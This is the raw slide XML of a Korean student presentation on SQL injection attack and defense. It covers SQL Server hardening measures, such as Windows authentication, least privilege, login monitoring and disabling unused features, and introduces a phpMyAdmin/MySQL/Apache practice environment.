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46"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="306" r:id="rId2"/>
    <p:sldId id="256" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="261" r:id="rId5"/>
    <p:sldId id="311" r:id="rId6"/>
    <p:sldId id="312" r:id="rId7"/>
    <p:sldId id="313" r:id="rId8"/>
    <p:sldId id="314" r:id="rId9"/>
    <p:sldId id="315" r:id="rId10"/>
    <p:sldId id="317" r:id="rId11"/>
    <p:sldId id="318" r:id="rId12"/>
    <p:sldId id="319" r:id="rId13"/>
    <p:sldId id="320" r:id="rId14"/>
    <p:sldId id="321" r:id="rId15"/>
    <p:sldId id="322" r:id="rId16"/>
    <p:sldId id="293" r:id="rId17"/>
    <p:sldId id="265" r:id="rId18"/>
    <p:sldId id="294" r:id="rId19"/>
    <p:sldId id="296" r:id="rId20"/>
    <p:sldId id="297" r:id="rId21"/>
    <p:sldId id="299" r:id="rId22"/>
    <p:sldId id="300" r:id="rId23"/>
    <p:sldId id="305" r:id="rId24"/>
    <p:sldId id="341" r:id="rId25"/>
    <p:sldId id="344" r:id="rId26"/>
    <p:sldId id="323" r:id="rId27"/>
    <p:sldId id="325" r:id="rId28"/>
    <p:sldId id="327" r:id="rId29"/>
    <p:sldId id="329" r:id="rId30"/>
    <p:sldId id="330" r:id="rId31"/>
    <p:sldId id="331" r:id="rId32"/>
    <p:sldId id="332" r:id="rId33"/>
    <p:sldId id="334" r:id="rId34"/>
    <p:sldId id="335" r:id="rId35"/>
    <p:sldId id="336" r:id="rId36"/>
    <p:sldId id="337" r:id="rId37"/>
    <p:sldId id="338" r:id="rId38"/>
    <p:sldId id="339" r:id="rId39"/>
    <p:sldId id="340" r:id="rId40"/>
    <p:sldId id="347" r:id="rId41"/>
    <p:sldId id="348" r:id="rId42"/>
    <p:sldId id="343" r:id="rId43"/>
    <p:sldId id="302" r:id="rId44"/>
    <p:sldId id="346" r:id="rId45"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="제주고딕" charset="-127"/>
      <p:regular r:id="rId47"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="제주명조" charset="-127"/>
      <p:regular r:id="rId48"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
      <p:regular r:id="rId49"/>
      <p:bold r:id="rId50"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="조선일보명조" charset="-127"/>
      <p:regular r:id="rId51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648" autoAdjust="0"/>
    <p:restoredTop sz="92937" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="108" d="100"/>
          <a:sy n="108" d="100"/>
        </p:scale>
        <p:origin x="-1704" y="-7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font" Target="fonts/font1.fntdata"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font4.fntdata"/><Relationship Id="rId55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54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font" Target="fonts/font2.fntdata"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide7.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font5.fntdata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4193C33-44B2-4C72-962F-B8DB093B0692}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2018-12-05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17AF018-58F3-4B98-9AB0-CEC5A9891B9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0105806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BD7033A-621F-4B00-A7CB-9CE762B7B899}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2018-12-05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130091-9970-4370-B95E-E20C3B09B2BE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7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s://www.youtube.com/watch?v=kzbArNF_K8Q&amp;feature=youtu.be" TargetMode="Externa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16492"/>
            <a:ext cx="9144000" cy="537321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0" y="0"/>
            <a:ext cx="9144000" cy="1484784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7504" y="188640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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill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조    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill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SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill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인젝션</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill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공격 및 방어 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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5" name="제목 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6444208" y="4437112"/>
            <a:ext cx="2304256" cy="2088232"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/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20142856</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty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이 규환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kumimoji="0" lang="en-US" altLang="ko-KR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2014</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" noProof="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16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" noProof="0" dirty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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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0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김 은종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dirty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20132956</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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이 석호 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean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20152215</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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서 동윤 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="ko-KR" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/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  <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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20164031</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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유 기찬</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty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제주고딕" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주고딕" pitchFamily="2" charset="-127"/>
                <a:cs typeface="조선일보명조" panose="02030304000000000000" pitchFamily="18" charset="-12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176544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528" y="188640"/>
            <a:ext cx="7488832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Part 2.     SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4000" dirty="0" err="1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인젝션</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="40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방어방법</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="6000" dirty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4" name="_PO3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="538162" y="1946870"/>
            <a:ext cx="7058173" cy="421843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Windows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인증을 이용한 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서버 연결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불필요한 사용자 제거</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="2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특권 제한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36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실패한 로그인 시도 감시</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="2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1" lang="en-US" altLang="ko-KR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사용하지 않는 기능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브라우저 서비스 비활성화</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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6280498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07504" y="116632"/>
            <a:ext cx="7344816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1" dirty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1</a:t>
            </a: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. Windows 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인증을 이용한 </a:t>
            </a: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SQL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서버 연결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8640960" cy="413190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제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>취약점</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF000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 - SQL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서버들은 자체 내에 로그인 제한 기능을 가지고 있지 않아 해커들이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2100" dirty="0" err="1" smtClean="0">
                <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>크아웃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(lockout)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당하지 않으면서 쉽게 몇 백만 개의 암호들을 확인해볼 수 있습니다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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2100" dirty="0" smtClean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endParaRPr lang="en-US" altLang="ko-KR" sz="2100" dirty="0" smtClean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B050"/>
                </a:solidFill>
                <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>방어방법</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B05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-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혼합 모드에서의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서버 인증을 피하고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Windows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인증을 사용해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서버에 연결하는 것입니다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918877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07504" y="116632"/>
            <a:ext cx="7344816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2. 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불필요한 사용자  제거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864096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제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>취약점</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2100" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF000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 -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모든 사용자에게 데이터베이스 내부 접근 권한을 제공하게 되면 데이터 취급 실수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핵심 파일 삭제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민감한 정보의 악용으로 이어지게 됩니다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또한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퇴사한 직원의 악의적인 행동으로 중요 파일이 제거될 수 도 있습니다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2100" dirty="0" smtClean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B050"/>
                </a:solidFill>
                <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>방어방법</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B05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-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데이터베이스 내부 접근 권한과 백업 폴더는 모든 사용자가 아닌 업무와 관련이 있는 소수의 사용자에게 그 접근이 제한되어야 합니다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9014782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07504" y="116632"/>
            <a:ext cx="7344816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3. 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특권 제한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8640960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제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>취약점</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2100" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF000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 -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특권사용자는 업무 특성에 따라 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2100" dirty="0" err="1" smtClean="0">
                <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>아웃소싱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직원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임시 계약직원도 가질 수 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2100" dirty="0" smtClean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있고 그 특권 사용자는 중요정보를 마음대로 접근할 수 있기 때문에 심각한 내부정보 유출 사고를 일으킬 수 있습니다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2100" dirty="0" smtClean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B050"/>
                </a:solidFill>
                <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>방어방법</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B05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- SQL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서버 계정 관리자들만이 모든 자료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백업 디렉터리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그리고 일기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/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쓰기 활동에 대한 완전한 권한을 부여 받고 특정 서비스에서 몇몇 권한이 필요한 사용자만 최소한의 권한을 부여해야 합니다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070592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07504" y="116632"/>
            <a:ext cx="7344816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4. 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실패한 로그인 감시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8640960" cy="41088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제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>취약점</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2100" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF000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-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앞서 말한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‘Windows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인증을 이용한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서버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연결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’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과 밀접한 관련이 있는 무차별 대입 공격입니다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2100" dirty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B050"/>
                </a:solidFill>
                <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>방어방법</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B05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-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무차별 대입 공격을 방지하기 위해 모든 로그인 시도들을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서버 오류 일지에 기록하고 그 정보를 바탕으로 비정상적인 로그인 행동을 확인</a:t>
            </a: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및 위협 발생 시 반응할 수 있게 됩니다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75764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07504" y="116632"/>
            <a:ext cx="7344816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5. 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사용하지 않는 기능 비활성화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8640960" cy="45935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FF0000"/>
                </a:solidFill>
                <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>취약점</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2100" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF000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 - ‘XP_CMDSHELL’, ‘OLE AUTOMATION’, ‘OPENROWSET’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그리고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‘OPENDATASET’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과 같이 중요 기능들이  공격받을 시 큰 피해를 입을 수 있습니다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  <a:p>
            <a:pPr fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2100" dirty="0" smtClean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400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주명조" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>방어방법</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill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- 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표면 공격을 줄이기 위해 사용하지 않는 기능은 비활성화 하는 것이 좋습니다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이는 서비스와 기능만이 아닌 프로토콜 또한 최소한으로 유지하여 보안 위험을 줄이는 것이 좋습니다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  <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2100" dirty="0" smtClean="0">
              <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
              <a:ea typeface="제주명조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103561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552" y="548680"/>
            <a:ext cx="8064896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Part 3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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개발 배경 및 소개</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="6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_PO3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="538163" y="2090886"/>
            <a:ext cx="6488112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개발 배경</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="2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_PO5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="538162" y="4221088"/>
            <a:ext cx="6488113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</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR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소개</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" 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29100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개발 배경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1196751"/>
            <a:ext cx="7704856" cy="549795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5358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kumimoji="1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개발 배경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008311"/>
            <a:ext cx="4320480" cy="570790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024" y="1033463"/>
            <a:ext cx="4248472" cy="568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73636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kumimoji="1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개발 배경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1640" y="1033463"/>
            <a:ext cx="6408711" cy="57079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657545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187624" y="1628800"/>
            <a:ext cx="39604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1.  SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" b="1" dirty="0" err="1" smtClean="0"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인젝션</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" b="1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</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="3600" b="1" dirty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>
            <a:off x="323528" y="332656"/>
            <a:ext cx="1872208" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175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직사각형 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323528" y="548680"/>
            <a:ext cx="1872208" cy="576064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dirty="0" smtClean="0">
                <a:latin typeface="제주고딕" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주고딕" pitchFamily="2" charset="-127"/>
                <a:cs typeface="조선일보명조" panose="02030304000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>목</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="제주고딕" pitchFamily="2" charset="-127"/>
                <a:ea typeface="제주고딕" pitchFamily="2" charset="-127"/>
                <a:cs typeface="조선일보명조" panose="02030304000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>차</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="직사각형 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187624" y="3573016"/>
            <a:ext cx="39604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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" b="1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.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" b="1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개발 배경</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" b="1" dirty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87624" y="4581128"/>
            <a:ext cx="39604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4.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" b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환경 및 실습</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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187624" y="5589240"/>
            <a:ext cx="3960440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5.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" b="1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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="28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현 영상</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" b="1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187624" y="2636912"/>
            <a:ext cx="5112568" cy="432048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2800" b="1" dirty="0"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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" b="1" dirty="0" smtClean="0"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.  SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" b="1" dirty="0" err="1" smtClean="0"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인젝션</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" b="1" dirty="0" smtClean="0"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 방어방법 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="3600" b="1" dirty="0">
              <a:latin typeface="제주명조" pitchFamily="2" charset="-127"/>
              <a:ea typeface="조선일보명조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 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1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소개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_PO2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="323528" y="1052736"/>
            <a:ext cx="8640960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2.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="2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 소개</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="20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8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i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/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1600" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/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인젝션은</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="1600" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/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오래되었지만 여전히 효과적이며 자주 사용되는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공격입니다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프로젝트는 사이트를 생성하고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인젝션을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실제로 활용함으로써 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웹 어플리케이션과 데이터베이스의 취약점을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확인하여 데이터의 비정상적인 작용을 알아보고 방어를 실습할 것 입니다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6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600" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty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ko-KR" sz="1600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87564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552" y="548680"/>
            <a:ext cx="8064896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Part </a:t>
            </a:r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환경 및 실습</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="6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_PO3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="538163" y="2090886"/>
            <a:ext cx="6488112" cy="141012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환경</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="2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R="0" lvl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-</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US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sz="2400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phpMyAdmin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- MySQL</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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400" dirty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   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- Apache</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" 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6" name="_PO5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="538162" y="4221088"/>
            <a:ext cx="6488113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400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공격 실습</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="2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en-US" altLang="ko-KR" sz="2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400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방어 실습</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" 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574094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환경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544" y="2435013"/>
            <a:ext cx="3652044" cy="2452964"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="_PO2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4860032" y="1989506"/>
            <a:ext cx="3456384" cy="71941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err="1" smtClean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php</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="4000" b="1" dirty="0" err="1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MyAdmin</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ko-KR" sz="40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_PO2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4391472" y="3284984"/>
            <a:ext cx="4573016" cy="16867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phpMyAdmin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은</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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MySQL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</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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월드와이드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웹 상에서 관리할 목적으로 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PHP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 작성한 오픈 소스도구입니다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데이터베이스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테이블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필드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열의 작성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수정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삭제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또 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상태 실행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사용자 및 사용 권한 관리 등의 다양한 작업을 수행할 수 있습니다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kumimoji="1" lang="ko-KR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027414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환경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_PO2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5004048" y="1989506"/>
            <a:ext cx="2880320" cy="71941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rgbClr val="00206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</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="4000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC00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</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ko-KR" sz="4000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FFC000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_PO2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4391472" y="3284984"/>
            <a:ext cx="4573016" cy="16867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MySQL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은 세계에서 가장 많이 쓰이는 오픈 소스의 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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관계형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데이터 베이스 관리 시스템입니다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endParaRPr kumimoji="1" lang="ko-KR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8" y="2492896"/>
            <a:ext cx="3744415" cy="2880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3651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환경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_PO2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5004048" y="1989506"/>
            <a:ext cx="2880320" cy="71941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Apache</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ko-KR" sz="4000" b="1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_PO2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4391472" y="3284984"/>
            <a:ext cx="4573016" cy="16867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아파치 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HTTP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서버는 아파치 소프트웨어 재단에서 관리하는 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HTTP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웹 서버입니다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</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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눅스와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같은 유닉스 계열 뿐 아니라 마이크로소프트 윈도우나 노벨 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US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넷웨어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같은 기종에도 운용할 수 있습니다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kumimoji="1" lang="ko-KR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527" y="2492896"/>
            <a:ext cx="3842815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50878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환경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_PO2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5004048" y="1989506"/>
            <a:ext cx="2880320" cy="71941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4000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050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ATOM</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ko-KR" sz="4000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="92D050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_PO2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4391472" y="3284984"/>
            <a:ext cx="4573016" cy="16867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dirty="0"/>
              <a:t> </a:t>
            </a:r>
